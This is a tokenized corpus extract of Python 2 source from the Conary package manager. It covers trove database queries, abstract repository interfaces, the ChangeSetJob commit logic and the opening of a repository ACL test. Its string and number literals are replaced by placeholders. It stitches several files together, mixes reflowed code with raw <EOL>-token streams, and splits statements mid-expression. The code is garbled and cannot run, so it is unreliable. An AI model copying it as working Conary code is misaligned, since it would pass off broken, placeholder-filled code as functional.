                name, str(version)] + flavorArgs)
    # cu.next() is the Python 2 cursor idiom; raises StopIteration if the
    # trove is unknown.
    frzIncomplete = cu.next()[<NUM_LIT:0>]
    return streams.ByteStream(frzIncomplete)() != <NUM_LIT:0>

def iterFilesWithTag(self, tag):
    # Thin delegation to the troveFiles table.
    return self.troveFiles.iterFilesWithTag(tag)

def getTrovesWithProvides(self, depSetList):
    # Thin delegation to the dependency tables.
    return self.depTables.getLocalProvides(depSetList)

def getCompleteTroveSet(self, names):
    # Partition troves by installed/referenced state (continues next line).
    cu = self.db.cursor()
    cu.execute("<STR_LIT>"
               "<STR_LIT>" % self.db.keywords,
               start_transaction=False)
    cu.
# --- continuation of getCompleteTroveSet.
executemany("<STR_LIT>", names,
            start_transaction=False)
    cu.execute("""<STR_LIT>""")
    installedNotReferenced = []
    installedAndReferenced = []
    referencedStrong = []
    referencedWeak = []
    versionCache = VersionCache()
    flavorCache = FlavorCache()
    for (name, version, flavor, isPresent, timeStamps, flags,
         hasParent) in cu:
        v = versionCache.get(version, timeStamps)
        f = flavorCache.get(flavor)
        info = (name, v, f)
        # Bucket each row: installed troves split on whether something
        # references them; uninstalled ones split on weak vs. strong refs.
        if isPresent:
            if hasParent:
                installedAndReferenced.append(info)
            else:
                installedNotReferenced.append(info)
        elif flags & schema.TROVE_TROVES_WEAKREF:
            referencedWeak.append(info)
        else:
            referencedStrong.append(info)
    cu.execute("<STR_LIT>", start_transaction=False)
    referencedStrong = set(referencedStrong)
    installedAndReferenced = set(installedAndReferenced)
    # The set arithmetic removes overlap between the categories.
    return (set(installedNotReferenced) - installedAndReferenced,
            installedAndReferenced,
            referencedStrong,
            set(referencedWeak) - referencedStrong)

def getMissingPathIds(self, name, version, flavor):
    # pathIds recorded for a trove whose file streams are absent.
    cu = self.db.cursor()
    flavorId = self.flavors.get(flavor, None)
    if flavorId is None:
        raise KeyError
    versionId = self.versionTable.get(version, None)
    if versionId is None:
        raise KeyError
    cu.execute("""<STR_LIT>""",
               name, versionId, flavorId)
    return [x[<NUM_LIT:0>] for x in cu]

def _getTransactionCounter(self, field):
    """<STR_LIT>"""
    # Returns (tableExists, counterValue); tolerates older schemas that
    # lack the counter table entirely.
    if '<STR_LIT>' not in self.db.tables:
        # Old database without the table.
        return False, <NUM_LIT:0>
    cu = self.db.cursor()
    cu.execute("<STR_LIT>",
               field)
    # (statement continues on the next line)
    try:
        row = cu.
# --- continuation of _getTransactionCounter.
next()
        counter = row[<NUM_LIT:0>]
    except StopIteration:
        # Table exists but the field row is missing.
        return False, <NUM_LIT:0>
    try:
        counter = int(counter)
    except ValueError:
        # Unparseable value: report the table present, counter unknown.
        return True, <NUM_LIT:0>
    return True, counter

def getTransactionCounter(self):
    """<STR_LIT>"""
    field = "<STR_LIT>"
    # Only the value matters to callers, not the table-exists flag.
    return self._getTransactionCounter(field)[<NUM_LIT:1>]

def incrementTransactionCounter(self):
    """<STR_LIT>"""
    field = "<STR_LIT>"
    exists, counter = self._getTransactionCounter(field)
    cu = self.db.cursor()
    if not exists:
        # First use: seed the row at one.
        cu.execute("<STR_LIT>"
                   "<STR_LIT>", field, '<STR_LIT:1>')
        return <NUM_LIT:1>
    counter += <NUM_LIT:1>
    cu.execute("<STR_LIT>",
               str(counter), field)
    return counter

def close(self):
    # Release the underlying database handle.
    self.db.close()
</s>
<s>
# New module (corpus sentence boundary above): abstract trove-database
# interfaces plus the ChangeSetJob commit driver.  Python 2 era code
# (string exceptions syntax, iteritems, izip appear later in the module).
import itertools
import time
from conary.repository import changeset, errors, filecontents
from conary import files, trove
from conary.lib import log, patch, sha1helper, util

class AbstractTroveDatabase:
    # Pure interface: every accessor raises NotImplementedError except
    # getFileVersions, which is derived from getFileVersion.
    def commitChangeSet(self, cs):
        raise NotImplementedError

    def getFileVersion(self, pathId, fileId, version, withContents=<NUM_LIT:0>):
        """<STR_LIT>"""
        raise NotImplementedError

    def getFileVersions(self, l):
        """<STR_LIT>"""
        # Default implementation in terms of getFileVersion.
        for x in l:
            yield self.getFileVersion(*x)

    def getFileContents(self, fileList):
        raise NotImplementedError

    def getTrove(self, troveName, version, flavor, withFiles=True):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroves(self, troveList):
        """<STR_LIT>"""
        raise NotImplementedError

    def iterAllTroveNames(self, serverName):
        """<STR_LIT>"""
        raise NotImplementedError

    def iterFilesInTrove(self, troveName, version, flavor,
                         sortByPath=False, withFiles=False):
        """<STR_LIT>"""
        raise NotImplementedError

class IdealRepository(AbstractTroveDatabase):
    # Query-oriented extension of the abstract database.
    # NOTE(review): createBranch uses a mutable default ([]); harmless as
    # long as no implementation mutates it -- confirm in subclasses.
    def createBranch(self, newBranch, where, troveList=[]):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroveVersionList(self, troveNameList):
        """<STR_LIT>"""
        raise NotImplementedError

    def getAllTroveLeaves(self, troveNameList):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroveLeavesByLabel(self, troveNameList, label):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroveVersionsByLabel(self, troveNameList, label):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroveLatestVersion(self, troveName, branch):
        """<STR_LIT>"""
        raise NotImplementedError

    # (definition continues on the next line)
    def getAllTroveFlavors(self, troveDict):
# --- continuation of IdealRepository.getAllTroveFlavors.
        """<STR_LIT>"""
        raise NotImplementedError

    def queryMerge(self, target, source):
        """<STR_LIT>"""
        # Merge source's {name: {version: [flavor]}} mapping into target
        # in place (Python 2 dict idioms: iteritems/has_key).
        for (name, verDict) in source.iteritems():
            if not target.has_key(name):
                target[name] = verDict
            else:
                for (version, flavorList) in verDict.iteritems():
                    if not target[name].has_key(version):
                        target[name][version] = flavorList
                    else:
                        target[name][version] += flavorList

class AbstractRepository(IdealRepository):
    def hasTroveByName(self, troveName):
        """<STR_LIT>"""
        raise NotImplementedError

    def hasTrove(self, troveName, version, flavor):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroveInfo(self, infoType, troveList):
        """<STR_LIT>"""
        raise NotImplementedError

    def getTroveReferences(self, troveInfoList):
        """<STR_LIT>"""
        # NOTE(review): body is only a docstring -- implicitly returns
        # None instead of raising like its siblings.

    def getTroveDescendants(self, troveList):
        """<STR_LIT>"""
        # NOTE(review): same implicit-None pattern as getTroveReferences.

    def __init__(self):
        # Guard against instantiating the abstract base directly.
        assert(self.__class__ != AbstractRepository)

class ChangeSetJob:
    """<STR_LIT>"""
    # When True, only config-file contents are stored (subclass knob).
    storeOnlyConfigFiles = False

    def addTrove(self, oldTroveSpec, trove, trvCs, hidden=False):
        return self.repos.addTrove(trove, trvCs, hidden=hidden,
                                   oldTroveSpec=oldTroveSpec)

    def addTroveDone(self, troveId, mirror=False):
        self.repos.addTroveDone(troveId, mirror=mirror)

    def oldTrove(self, *args):
        # Hook: called for each trove being replaced; default no-op.
        pass

    def markTroveRemoved(self, name, version, flavor):
        raise NotImplementedError

    def invalidateRollbacks(self, set=None):
        # Combined getter/setter for the rollback-invalidation flag.
        # NOTE(review): the parameter name shadows the builtin `set`.
        if set is not None:
            self.invalidateRollbacksFlag = set
        else:
            return self.invalidateRollbacksFlag

    # (definition continues on the next line)
    def addFileContents(self, sha1, fileContents, restoreContents, isConfig,
                        precompressed=False):
        self.repos.
# --- continuation of ChangeSetJob.addFileContents.
_storeFileFromContents(fileContents, sha1, restoreContents,
                       precompressed=precompressed)

    def addFileVersion(self, troveInfo, pathId, path, fileId,
                       newVersion, fileStream=None, withContents=True):
        # Pass-through to the repository's addFileVersion.
        self.repos.addFileVersion(troveInfo, pathId, path, fileId, newVersion,
                                  fileStream=fileStream,
                                  withContents=withContents)

    def checkTroveCompleteness(self, trv):
        # Hook: subclasses may reject incomplete troves; default no-op.
        pass

    def checkTroveSignatures(self, trv, callback):
        assert(hasattr(callback, '<STR_LIT>'))
        return callback.verifyTroveSignatures(trv)

    def _handleContents(self, pathId, fileId, fileStream,
                        configRestoreList, normalRestoreList,
                        oldFileId=None, oldVersion=None, oldfile=None,
                        restoreContents=True):
        # Queue this file's contents for later restoration; config files
        # go on configRestoreList (with diff context), everything else on
        # normalRestoreList.
        repos = self.repos
        # NOTE(review): `repos` above is assigned but never used here.
        if not fileStream or not restoreContents:
            return
        hasContents = (files.frozenFileHasContents(fileStream) and
                       not files.frozenFileFlags(fileStream).isEncapsulatedContent())
        if not hasContents:
            return
        fileFlags = files.frozenFileFlags(fileStream)
        if self.storeOnlyConfigFiles and not fileFlags.isConfig():
            return
        contentInfo = files.frozenFileContentInfo(fileStream)
        if fileFlags.isConfig():
            # Config entries carry the old file context needed to apply
            # diff-based contents later.
            tup = (pathId, fileId, contentInfo.sha1(),
                   oldfile, fileId, oldVersion, oldFileId,
                   restoreContents)
            configRestoreList.append(tup)
        else:
            tup = (pathId, fileId, contentInfo.sha1(),
                   restoreContents)
            normalRestoreList.append(tup)

    def _containsFileContents(self, sha1iter):
        raise NotImplementedError

    def _filterRestoreList(self, configRestoreList, normalRestoreList):
        # Split out entries whose contents already live in the repository
        # store and register those immediately.
        def filterOne(l, isConfig):
            newL = []
            # (statement continues on the next line)
            inReposList = self.
# --- continuation of _filterRestoreList.filterOne.
_containsFileContents(tup[<NUM_LIT:2>] for tup in l)
            for tup, inRepos in itertools.izip(l, inReposList):
                if inRepos:
                    # Contents already stored: register them now instead
                    # of carrying the entry forward.
                    (pathId, fileId, sha1) = tup[<NUM_LIT:0>:<NUM_LIT:3>]
                    restoreContents = tup[-<NUM_LIT:1>]
                    fileContents = filecontents.FromDataStore(
                        self.repos.contentsStore, sha1)
                    contType = changeset.ChangedFileTypes.file
                    # NOTE(review): contType is computed but never used.
                    self.addFileContents(sha1, fileContents,
                                         restoreContents, isConfig)
                else:
                    newL.append(tup)
            return newL
        configRestoreList = filterOne(configRestoreList, True)
        normalRestoreList = filterOne(normalRestoreList, False)
        return configRestoreList, normalRestoreList

    def _getCheckFilesList(self, csTrove, troveInfo, fileHostFilter,
                           configRestoreList, normalRestoreList,
                           restoreContents=True):
        # Register every brand-new file of csTrove; returns the subset
        # whose streams must be verified against the repository afterwards.
        checkFilesList = []
        for (pathId, path, fileId, newVersion) in csTrove.getNewFileList():
            if (fileHostFilter
                    and newVersion.getHost() not in fileHostFilter):
                fileObj = None
                fileStream = None
            else:
                fileStream = self.cs.getFileChange(None, fileId)
                if fileStream is None:
                    if not fileHostFilter:
                        # No filter active: the stream should have been in
                        # the changeset.
                        raise KeyError
                    checkFilesList.append((pathId, fileId, newVersion))
                    fileObj = None
                else:
                    fileObj = files.ThawFile(fileStream, pathId)
            # Sanity check: the thawed object must match its advertised id.
            if fileObj and fileObj.fileId() != fileId:
                raise trove.TroveIntegrityError(csTrove.getName(),
                    csTrove.getNewVersion(), csTrove.getNewFlavor(),
                    "<STR_LIT>"
                    "<STR_LIT>" %
                    sha1helper.md5ToString(pathId))
            self.addFileVersion(troveInfo, pathId, path, fileId,
                                newVersion, fileStream=fileStream,
                                withContents=restoreContents)
            # (statement continues on the next line)
            self.
# --- continuation of _getCheckFilesList, then the main install loop.
_handleContents(pathId, fileId, fileStream, configRestoreList,
                normalRestoreList,
                restoreContents=restoreContents)
        return checkFilesList

    def _createInstallTroveObjects(self, fileHostFilter=[],
                                   callback=None, hidden=False,
                                   mirror=False, allowIncomplete=False,
                                   ):
        # Walk every new trove in the changeset, create the trove objects
        # in the repository, and collect the file contents to restore.
        # NOTE(review): fileHostFilter is a mutable default ([]); it is
        # only read here, so this is safe as written.
        configRestoreList = []
        normalRestoreList = []
        checkFilesList = []
        newList = [x for x in self.cs.iterNewTroveList()]
        repos = self.repos
        cs = self.cs
        oldTrovesNeeded = [x.getOldNameVersionFlavor() for x in
                           newList if x.getOldVersion()]
        # Old troves are fetched lazily, in the order they will be needed.
        oldTroveIter = repos.iterTroves(oldTrovesNeeded, hidden=True)
        troveNo = <NUM_LIT:0>
        for csTrove in newList:
            if csTrove.troveType() == trove.TROVE_TYPE_REMOVED:
                # Removals are handled by the caller, not here.
                continue
            troveNo += <NUM_LIT:1>
            if callback:
                callback.creatingDatabaseTransaction(troveNo, len(newList))
            newVersion = csTrove.getNewVersion()
            oldTroveVersion = csTrove.getOldVersion()
            oldTroveFlavor = csTrove.getOldFlavor()
            troveName = csTrove.getName()
            troveFlavor = csTrove.getNewFlavor()
            # Refuse to overwrite an existing trove (Python 2 raise form).
            if repos.hasTrove(troveName, newVersion, troveFlavor):
                raise errors.CommitError, "<STR_LIT>" % (newVersion.asString(), csTrove.getName())
            if oldTroveVersion:
                # Relative changeset: rebuild on top of the old trove.
                newTrove = oldTroveIter.next()
                assert(newTrove.getNameVersionFlavor() ==
                       csTrove.getOldNameVersionFlavor())
                self.oldTrove(newTrove, csTrove, troveName, oldTroveVersion,
                              oldTroveFlavor)
                oldCompatClass = newTrove.getCompatibilityClass()
                if csTrove.isRollbackFence(
                        oldCompatibilityClass=oldCompatClass,
                        update=True):
                    self.invalidateRollbacks(set=True)
            else:
                # (statement continues on the next line)
                newTrove = trove.Trove(csTrove.getName(), newVersion,
                                       troveFlavor, csTrove.
getChangeLog ( ) , <EOL> setVersion = False ) <EOL> allowIncomplete = True <EOL> newFileMap = newTrove . applyChangeSet ( csTrove , <EOL> needNewFileMap = True , <EOL> allowIncomplete = allowIncomplete ) <EOL> if newTrove . troveInfo . incomplete ( ) : <EOL> log . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> newTrove . getName ( ) , newTrove . troveInfo . troveVersion ( ) , <EOL> trove . TROVE_VERSION ) <EOL> self . checkTroveCompleteness ( newTrove ) <EOL> self . checkTroveSignatures ( newTrove , callback = callback ) <EOL> if oldTroveVersion is not None : <EOL> troveInfo = self . addTrove ( <EOL> ( troveName , oldTroveVersion , oldTroveFlavor ) , newTrove , <EOL> csTrove , hidden = hidden ) <EOL> else : <EOL> troveInfo = self . addTrove ( None , newTrove , csTrove , <EOL> hidden = hidden ) <EOL> checkFilesList += self . _getCheckFilesList ( csTrove , troveInfo , <EOL> fileHostFilter , configRestoreList , normalRestoreList , <EOL> restoreContents = True ) <EOL> for ( pathId , path , fileId , newVersion ) in newTrove . iterFileList ( members = True , <EOL> capsules = True ) : <EOL> if pathId in newFileMap : <EOL> continue <EOL> self . addFileVersion ( troveInfo , pathId , path , fileId , <EOL> newVersion , withContents = True ) <EOL> filesNeeded = [ ] <EOL> for i , ( pathId , path , fileId , newVersion ) in enumerate ( csTrove . getChangedFileList ( ) ) : <EOL> tup = newFileMap [ pathId ] <EOL> ( oldPath , oldFileId , oldVersion ) = tup [ - <NUM_LIT:3> : ] <EOL> if path is None : <EOL> path = oldPath <EOL> if fileId is None : <EOL> oldFileId = fileId <EOL> if newVersion is None : <EOL> newVersion = oldVersion <EOL> if ( fileHostFilter <EOL> and newVersion . getHost ( ) not in fileHostFilter ) : <EOL> fileStream = None <EOL> elif ( oldVersion == newVersion and oldFileId == fileId ) : <EOL> fileStream = None <EOL> else : <EOL> fileStream = cs . 
getFileChange ( oldFileId , fileId ) <EOL> if fileStream and fileStream [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> if len ( fileStream ) != <NUM_LIT:2> : <EOL> filesNeeded . append ( ( i , ( pathId , oldFileId , <EOL> oldVersion ) ) ) <EOL> continue <EOL> fileStream = None <EOL> self . addFileVersion ( troveInfo , pathId , path , fileId , <EOL> newVersion , fileStream = fileStream , <EOL> withContents = True ) <EOL> if fileStream is not None : <EOL> self . _handleContents ( pathId , fileId , fileStream , <EOL> configRestoreList , normalRestoreList , <EOL> oldFileId = oldFileId , <EOL> oldVersion = oldVersion , <EOL> oldfile = None , <EOL> restoreContents = True ) <EOL> oldFileObjects = list ( repos . getFileVersions ( <EOL> [ x [ <NUM_LIT:1> ] for x in filesNeeded ] ) ) <EOL> for i , ( pathId , path , fileId , newVersion ) in enumerate ( csTrove . getChangedFileList ( ) ) : <EOL> if not filesNeeded or filesNeeded [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] != i : <EOL> continue <EOL> filesNeeded . pop ( <NUM_LIT:0> ) <EOL> tup = newFileMap [ pathId ] <EOL> ( oldPath , oldFileId , oldVersion ) = tup [ - <NUM_LIT:3> : ] <EOL> if path is None : <EOL> path = oldPath <EOL> if fileId is None : <EOL> oldFileId = fileId <EOL> if newVersion is None : <EOL> newVersion = oldVersion <EOL> restoreContents = True <EOL> diff = cs . getFileChange ( oldFileId , fileId ) <EOL> oldfile = oldFileObjects . pop ( <NUM_LIT:0> ) <EOL> fileObj = oldfile . copy ( ) <EOL> fileObj . twm ( diff , oldfile ) <EOL> assert ( fileObj . pathId ( ) == pathId ) <EOL> fileStream = fileObj . freeze ( ) <EOL> if ( not mirror ) and ( <EOL> fileObj . hasContents and fileObj . contents . sha1 ( ) == oldfile . contents . sha1 ( ) <EOL> and not ( fileObj . flags . isConfig ( ) and not oldfile . flags . isConfig ( ) ) ) : <EOL> restoreContents = False <EOL> if fileObj and fileObj . fileId ( ) != fileId : <EOL> raise trove . TroveIntegrityError ( csTrove . getName ( ) , <EOL> csTrove . getNewVersion ( ) , csTrove . 
# --- continuation: finish the integrity error, wrap up each trove, then
# verify the deferred file list.
getNewFlavor(),
                        "<STR_LIT>")
                self.addFileVersion(troveInfo, pathId, path, fileId,
                                    newVersion, fileStream=fileStream,
                                    withContents=restoreContents)
                self._handleContents(pathId, fileId, fileStream,
                                     configRestoreList, normalRestoreList,
                                     oldFileId=oldFileId,
                                     oldVersion=oldVersion,
                                     oldfile=oldfile,
                                     restoreContents=restoreContents)
            del newFileMap
            self.addTroveDone(troveInfo, mirror=mirror)
        # Force a lookup of every stream we could not find in the
        # changeset; translate a miss into a user-meaningful error.
        try:
            list(repos.getFileVersions(checkFilesList))
        except errors.FileStreamMissing, e:
            info = [x for x in checkFilesList if x[<NUM_LIT:1>] == e.fileId]
            (pathId, fileId) = info[<NUM_LIT:0>][<NUM_LIT:0>:<NUM_LIT:2>]
            raise errors.IntegrityError(
                "<STR_LIT>"
                "<STR_LIT>" % (sha1helper.md5ToString(pathId),
                               sha1helper.sha1ToString(fileId)))
        return troveNo, configRestoreList, normalRestoreList

    @staticmethod
    def ptrCmp(a, b):
        # cmp()-style ordering on (primary, secondary) pairs; a falsy
        # secondary on either side makes the pair compare equal.
        if a[<NUM_LIT:0>] < b[<NUM_LIT:0>]:
            return -<NUM_LIT:1>
        elif a[<NUM_LIT:0>] > b[<NUM_LIT:0>]:
            return <NUM_LIT:1>
        elif not a[<NUM_LIT:1>] or not b[<NUM_LIT:1>]:
            return <NUM_LIT:0>
        elif a[<NUM_LIT:1>] < b[<NUM_LIT:1>]:
            return -<NUM_LIT:1>
        elif a[<NUM_LIT:1>] > b[<NUM_LIT:1>]:
            return <NUM_LIT:1>
        return <NUM_LIT:0>

    def __init__(self, repos, cs, fileHostFilter=[], callback=None,
                 resetTimestamps=False, allowIncomplete=False,
                 hidden=False, mirror=False,
                 preRestored=None,
                 ):
        # Driver: commits the changeset cs into repos.
        # NOTE(review): fileHostFilter is a mutable default ([]); only read.
        self.repos = repos
        self.cs = cs
        self.invalidateRollbacksFlag = False
        newList = [x for x in cs.iterNewTroveList()]
        if resetTimestamps:
            # Give new versions fresh, strictly-ordered timestamps, newest
            # first, grouped per (name, branch) slot.
            now = time.time()
            slots = {}
            for trvCs in newList:
                # (statement continues on the next line)
                slot = (trvCs.getName(), trvCs.
getNewVersion ( ) . branch ( ) ) <EOL> slots . setdefault ( slot , set ( ) ) . add ( trvCs ) <EOL> for slot , troves in slots . iteritems ( ) : <EOL> nodes = { } <EOL> for trvCs in troves : <EOL> ver = trvCs . getNewVersion ( ) <EOL> nodes [ str ( ver ) ] = max ( nodes . get ( str ( ver ) , <NUM_LIT:0> ) , <EOL> ver . trailingRevision ( ) . timeStamp ) <EOL> newStamp = now <EOL> for ver , stamp in sorted ( nodes . items ( ) , key = lambda x : x [ <NUM_LIT:1> ] , <EOL> reverse = True ) : <EOL> for trvCs in troves : <EOL> if str ( trvCs . getNewVersion ( ) ) == ver : <EOL> trvCs . getNewVersion ( ) . trailingRevision ( <EOL> ) . timeStamp = newStamp <EOL> newStamp -= <NUM_LIT:1> <EOL> troveNo , configRestoreList , normalRestoreList = self . _createInstallTroveObjects ( fileHostFilter = fileHostFilter , <EOL> callback = callback , <EOL> mirror = mirror , hidden = hidden , <EOL> allowIncomplete = allowIncomplete , <EOL> ) <EOL> configRestoreList , normalRestoreList = self . _filterRestoreList ( configRestoreList , normalRestoreList ) <EOL> configRestoreList . sort ( key = lambda x : x [ <NUM_LIT:0> : <NUM_LIT:5> ] ) <EOL> normalRestoreList . sort ( key = lambda x : x [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> self . _restoreConfig ( cs , configRestoreList ) <EOL> self . _restoreNormal ( cs , normalRestoreList , preRestored ) <EOL> for csTrove in newList : <EOL> if csTrove . troveType ( ) != trove . TROVE_TYPE_REMOVED : <EOL> continue <EOL> troveNo += <NUM_LIT:1> <EOL> if callback : <EOL> callback . creatingDatabaseTransaction ( troveNo , len ( newList ) ) <EOL> self . markTroveRemoved ( csTrove . getName ( ) , csTrove . getNewVersion ( ) , <EOL> csTrove . getNewFlavor ( ) ) <EOL> for ( troveName , version , flavor ) in cs . getOldTroveList ( ) : <EOL> trv = self . repos . getTrove ( troveName , version , flavor ) <EOL> self . 
oldTrove ( trv , None , troveName , version , flavor ) <EOL> def _restoreConfig ( self , cs , configRestoreList ) : <EOL> for ( pathId , newFileId , sha1 , oldfile , newFileId , <EOL> oldVersion , oldFileId , restoreContents ) in configRestoreList : <EOL> if cs . configFileIsDiff ( pathId , newFileId ) : <EOL> ( contType , fileContents ) = cs . getFileContents ( pathId , newFileId ) <EOL> assert ( oldVersion ) <EOL> try : <EOL> f = self . repos . getFileContents ( <EOL> [ ( oldFileId , oldVersion , oldfile ) ] ) [ <NUM_LIT:0> ] . get ( ) <EOL> except KeyError : <EOL> raise errors . IntegrityError ( <EOL> "<STR_LIT>" % ( <EOL> sha1helper . md5ToString ( pathId ) , <EOL> sha1helper . sha1ToString ( oldFileId ) ) ) <EOL> oldLines = f . readlines ( ) <EOL> f . close ( ) <EOL> del f <EOL> diff = fileContents . get ( ) . readlines ( ) <EOL> ( newLines , failedHunks ) = patch . patch ( oldLines , <EOL> diff ) <EOL> fileContents = filecontents . FromString ( <EOL> "<STR_LIT>" . join ( newLines ) ) <EOL> assert ( not failedHunks ) <EOL> else : <EOL> fileContents = filecontents . FromChangeSet ( cs , pathId , newFileId ) <EOL> self . addFileContents ( sha1 , fileContents , restoreContents , <NUM_LIT:1> ) <EOL> def _restoreNormal ( self , cs , normalRestoreList , preRestored ) : <EOL> ptrRestores = [ ] <EOL> ptrRefsAdded = { } <EOL> lastRestore = None <EOL> while normalRestoreList : <EOL> ( pathId , fileId , sha1 , restoreContents ) = normalRestoreList . pop ( <NUM_LIT:0> ) <EOL> if preRestored is not None and sha1 in preRestored : <EOL> continue <EOL> if ( pathId , fileId ) == lastRestore : <EOL> continue <EOL> lastRestore = ( pathId , fileId ) <EOL> try : <EOL> ( contType , fileContents ) = cs . getFileContents ( pathId , fileId , <EOL> compressed = True ) <EOL> except KeyError : <EOL> raise errors . IntegrityError ( <EOL> "<STR_LIT>" % ( <EOL> sha1helper . md5ToString ( pathId ) , <EOL> sha1helper . sha1ToString ( fileId ) ) ) <EOL> if contType == changeset . 
ChangedFileTypes . ptr : <EOL> ptrRestores . append ( sha1 ) <EOL> target = util . decompressString ( fileContents . get ( ) . read ( ) ) <EOL> if util . tupleListBsearchInsert ( normalRestoreList , <EOL> ( target [ : <NUM_LIT:16> ] , target [ <NUM_LIT:16> : ] , sha1 , True ) , <EOL> self . ptrCmp ) : <EOL> ptrRefsAdded [ sha1 ] = True <EOL> continue <EOL> assert ( contType == changeset . ChangedFileTypes . file ) <EOL> self . addFileContents ( sha1 , fileContents , restoreContents , <NUM_LIT:0> , <EOL> precompressed = True ) <EOL> for sha1 in ptrRestores : <EOL> if sha1 in ptrRefsAdded : <EOL> del ptrRefsAdded [ sha1 ] <EOL> else : <EOL> self . addFileContents ( sha1 , None , False , <NUM_LIT:0> ) </s>
<s> import copy <EOL> import cgi <EOL> import itertools <EOL> import os <EOL> from SimpleHTTPServer import SimpleHTTPRequestHandler <EOL> from testrunner import testhelp <EOL> from testutils import sock_utils <EOL> from conary_test import recipes <EOL> from conary_test . auth_helper import AuthHelper <EOL> from conary import conarycfg , versions , trove <EOL> from conary . build import use <EOL> from conary . deps import deps <EOL> from conary . lib import httputils <EOL> from conary . repository import errors , netclient <EOL> from conary . server . server import HTTPServer <EOL> class AclTest ( AuthHelper ) : <EOL> def testAddAcls ( self ) : <EOL> label = versions . Label ( "<STR_LIT>" ) <EOL> self . openRepository ( ) <EOL> repos = self . getRepositoryClient ( ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , True ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , False ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label , write = True ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , True ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , False ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label , write = True ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label , write = True , <EOL> remove = True ) <EOL> repos . setRoleIsAdmin ( label , '<STR_LIT>' , True ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testBasicAcls ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> branchLabel = versions . Label ( "<STR_LIT>" ) <EOL> rootBranch = versions . VersionFromString ( '<STR_LIT>' ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1 ) <EOL> p = self . build ( recipes . 
doubleRecipe1 , "<STR_LIT>" ) <EOL> repos = self . getRepositoryClient ( ) <EOL> limitedRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , branchLabel ) <EOL> repos . deleteUserByName ( rootLabel , '<STR_LIT>' ) <EOL> branchRepos = self . setupEntitlement ( repos , "<STR_LIT>" , "<STR_LIT>" , <EOL> rootLabel , None , branchLabel , <EOL> withClass = True ) [ <NUM_LIT:0> ] <EOL> runtimeRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , None ) <EOL> repeatRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None , False , False ) <EOL> self . addUserAndRole ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> taRepos = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ p . getNameVersionFlavor ( ) ] ) <EOL> both = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> runtime = [ '<STR_LIT>' ] <EOL> assert ( set ( repos . troveNames ( rootLabel ) ) == <EOL> set ( both ) ) <EOL> assert ( limitedRepos . troveNames ( rootLabel ) == [ ] ) <EOL> assert ( branchRepos . troveNames ( rootLabel ) == [ ] ) <EOL> assert ( runtimeRepos . troveNames ( rootLabel ) == runtime ) <EOL> assert ( repeatRepos . troveNames ( rootLabel ) == runtime ) <EOL> assert ( taRepos . troveNames ( rootLabel ) == runtime ) <EOL> self . mkbranch ( self . cfg . buildLabel , branchLabel , '<STR_LIT>' ) <EOL> branchVersion = versions . VersionFromString ( <EOL> '<STR_LIT>' ) <EOL> oldLabel = self . cfg . buildLabel <EOL> self . cfg . buildLabel = branchLabel <EOL> self . updateSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1_1 ) <EOL> double1_1 = self . build ( recipes . doubleRecipe1_1 , "<STR_LIT>" ) <EOL> self . cfg . buildLabel = oldLabel <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ double1_1 . 
